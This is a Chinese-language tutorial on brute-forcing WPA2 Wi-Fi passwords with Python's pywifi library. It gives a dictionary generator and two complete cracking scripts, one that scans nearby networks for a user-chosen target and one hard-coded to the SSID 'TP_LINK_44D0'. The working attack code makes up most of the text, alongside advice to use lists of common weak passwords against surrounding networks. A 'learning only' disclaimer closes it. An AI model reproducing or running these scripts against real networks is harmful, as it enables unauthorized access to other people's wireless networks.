目录
# 修正记录:2022-12-01
1,先安装Python环境(这个不用多说了吧)
2,安装PyWifi
3,自己手工整理高频弱口令,不建议程序生成的字典,生成的字典成功率实在太低。
4,自己生成字典的算法:
5,破解WIF代码第一种(2022-12-01):
6,破解WIF代码第二种:
7,执行破解成功效果截图(成功连接):
8,总结:
9,温馨提示。
# 修正记录:2022-12-01
【破解WIF代码第一种】修正一个小错误,表现为代码执行多次后会报:ERROR Open handle failed!错误。已修正。并增加了尝试次数记数及显示。
效果如下图:
1,先安装Python环境(这个不用多说了吧)
2,安装PyWifi
pip install pywifi3,自己手工整理高频弱口令,不建议程序生成的字典,生成的字典成功率实在太低。
完全是在浪费时间和资源。实话实说
一般字典包括数字(0-9)、字母(a-z,区分大小写)、特殊字符(!@#$%^&*()_+=-)常规WPA2 wifi密码为最低8位,且仅包括数字和小写字母,所以我们可以从数字和字母组成的字符串中随机挑选出8位(单个字符可重复出现),作为wifi密码组成字典存入txt文档。4,自己生成字典的算法:
import itertools as itswords = "1234567890abcdefghijklmnopqrstuvwxyz" #可选择的字符r =its.product(words,repeat=8) #组成8位字符串dic = open("pwd.txt","a") #存储为wifi密码字典#wifi密码完成换行,并写入txt文档for i in r: dic.write("".join(i)) dic.write("".join("\n"))dic.close()5,破解WIF代码第一种(2022-12-01修正):
import pywifiimport timeimport datetimefrom pywifi import const # WiFi扫描模块def wifi_scan(): # 初始化wifi wifi = pywifi.PyWiFi() # 使用第一个无线网卡 interface = wifi.interfaces()[0] # 开始扫描 interface.scan() for i in range(4): time.sleep(1) # print('\r扫描可用 WiFi 中,请稍后。。。(' + str(3 - i), end=')\n') print('\r扫描可用 WiFi 中,请稍后。。。(' + str(3 - i)+')') print('\r扫描完成!\n' + '-' * 38) print('\r{:4}{:6}{}'.format('编号', '信号强度', 'wifi名')) # 扫描结果,scan_results()返回一个集,存放的是每个wifi对象 bss = interface.scan_results() # 存放wifi名的集合 wifi_name_set = set() for w in bss: # 解决乱码问题 wifi_name_and_signal = (100 + w.signal, w.ssid.encode('raw_unicode_escape').decode('utf-8')) wifi_name_set.add(wifi_name_and_signal) # 存入列表并按信号排序 wifi_name_list = list(wifi_name_set) wifi_name_list = sorted(wifi_name_list, key=lambda a: a[0], reverse=True) num = 0 # 格式化输出 while num < len(wifi_name_list): print('\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1])) num += 1 print('-' * 38) # 返回wifi列表 return wifi_name_list # WIFI破解模块def wifi_password_crack(wifi_name): # 字典路径 dic_path = input("请输入本地用于WIFI暴力破解的密码字典(txt格式,每个密码占据1行)的路径:") if dic_path =="": dic_path = "pwd.txt" # 打开文件 # file = open(dic_path, "r") start = datetime.datetime.now() iCount = 0 # 创建wifi对象 wifi = pywifi.PyWiFi() # 创建网卡对象,为第一个wifi网卡 interface = wifi.interfaces()[0] with open(dic_path, 'r') as f: # 遍历密码 for pwd in f: # 去除密码的末尾换行符 pwd = pwd.strip('\n') # ERROR Open handle failed!将这创建对象过程移到上面,防止多次执行时报错 # 创建wifi对象 # wifi = pywifi.PyWiFi() # 创建网卡对象,为第一个wifi网卡 # interface = wifi.interfaces()[0] # 断开所有wifi连接 interface.disconnect() # 等待其断开 while interface.status() == 4: # 当其处于连接状态时,利用循环等待其断开 pass # 创建连接文件(对象) profile = pywifi.Profile() # wifi名称 profile.ssid = wifi_name # 需要认证 profile.auth = const.AUTH_ALG_OPEN # wifi默认加密算法 profile.akm.append(const.AKM_TYPE_WPA2PSK) profile.cipher = const.CIPHER_TYPE_CCMP # wifi密码 profile.key = pwd # 删除所有wifi连接文件 interface.remove_all_network_profiles() # 设置新的wifi连接文件 tmp_profile = interface.add_network_profile(profile) # 开始尝试连接 interface.connect(tmp_profile) #start_time = time.time() time.sleep(1.5) #while time.time() - start_time < 1.5: # 接口状态为4代表连接成功(当尝试时间大于1.5秒之后则为错误密码,经测试测正确密码一般都在1.5秒内连接,若要提高准确性可以设置为2s或以上,相应暴力破解速度就会变慢) if interface.status() == const.IFACE_CONNECTED: print(f'\r连接成功!密码为:{pwd}') m, s = divmod((end - start).seconds, 60) h, m = divmod(m, 60) print(f"本次破解WIFI密码共用时:{h}时{m}分{s}秒") exit(0) else: print(f'\r[{iCount}]正在利用密码 {pwd} 尝试...') end = datetime.datetime.now() iCount= iCount+1# 主函数def main(): # 退出标致 exit_flag = 0 # 目标编号 target_num = -1 while not exit_flag: try: print('WIFI破解'.center(35, '-')) # 调用扫描模块,返回一个排序后的wifi列表 wifi_list = wifi_scan() # 让用户选择要破解的wifi编号,并对用户输入的编号进行判断和异常处理 choose_exit_flag = 0 while not choose_exit_flag: try: target_num = int(input('请选择你要尝试破解的wifi:')) # 如果要选择的wifi编号在列表内,继续二次判断,否则重新输入 if target_num in range(len(wifi_list)): # 二次确认 while not choose_exit_flag: try: choose = str(input(f'你选择要破解的WiFi名称是:{wifi_list[target_num][1]},确定吗?(Y/N)')) # 对用户输入进行小写处理,并判断 if choose.lower() == 'y': choose_exit_flag = 1 elif choose.lower() == 'n': break # 处理用户其它字母输入 else: print('只能输入 Y/N') # 处理用户非字母输入 except ValueError: print('只能输入 Y/N') # 退出破解 if choose_exit_flag == 1: break else: print('请重新输入') except ValueError: print('只能输入数字') # 密码破解,传入用户选择的wifi名称 wifi_password_crack(wifi_list[target_num][1]) print('-' * 38) exit_flag = 1 except Exception as e: print(e) raise e if __name__ == '__main__': main()6,破解WIF代码第二种:
import pywififrom pywifi import constimport timeimport datetime# 测试连接,返回链接结果def wifiConnect(pwd): # 抓取网卡接口 wifi = pywifi.PyWiFi() # 获取第一个无线网卡 ifaces = wifi.interfaces()[0] # 断开所有连接 ifaces.disconnect() time.sleep(1) wifistatus = ifaces.status() if wifistatus == const.IFACE_DISCONNECTED: # 创建WiFi连接文件 profile = pywifi.Profile() # 要连接WiFi的名称 profile.ssid = "TP_LINK_44D0" # 网卡的开放状态 profile.auth = const.AUTH_ALG_OPEN # wifi加密算法,一般wifi加密算法为wps profile.akm.append(const.AKM_TYPE_WPA2PSK) # 加密单元 profile.cipher = const.CIPHER_TYPE_CCMP # 调用密码 profile.key = pwd # 删除所有连接过的wifi文件 ifaces.remove_all_network_profiles() # 设定新的连接文件 tep_profile = ifaces.add_network_profile(profile) ifaces.connect(tep_profile) # wifi连接时间 time.sleep(2) if ifaces.status() == const.IFACE_CONNECTED: return True else: return False else: print("已有wifi连接")# 读取密码本def readPassword(): success = False print("****************** WIFI破解 ******************") # 密码本路径 path = "pwd.txt" # 打开文件 file = open(path, "r") start = datetime.datetime.now() while True: try: pwd = file.readline() # 去除密码的末尾换行符 pwd = pwd.strip('\n') bool = wifiConnect(pwd) if bool: print("[*] 密码已破解:", pwd) print("[*] WiFi已自动连接!!!") success = True break else: # 跳出当前循环,进行下一次循环 print("正在破解 SSID 为 %s 的 WIFI密码,当前校验的密码为:%s"%("TP_LINK_44D0",pwd)) except: continue end = datetime.datetime.now() if(success): print("[*] 本次破解WIFI密码一共用了多长时间:{}".format(end - start)) else: print("[*] 很遗憾未能帮你破解出当前指定WIFI的密码,请更换密码字典后重新尝试!") exit(0)if __name__=="__main__": readPassword()7,执行破解成功效果截图(成功连接):
8,总结:
实话告诉你,现在WPA2 WIF密码破解成功的概率基本为0,不要妄想可以通过一段脚本就独步天下。哈哈,那是不可能的。WPA2的加密方式决定了密码是基本不可能被破解的。但是。不可能被破解,不代表不能被尝试验证。尝试是需要代价的,一次密码尝试至少需要1.5秒时间。所以。如果想用跑字典方式来破解周边WIFI。我认为只需要手工整理1000-10000个左右>=8的全网高频弱口令密码即可。跑起来也快。成不成就这几下子。据有关组织统计。10000个高频密码基本可以涵盖全网60%的密码。真有这么高的概率。信不信由你。
9,温馨提示。
代码仅供学习用途。勿用于非法用途!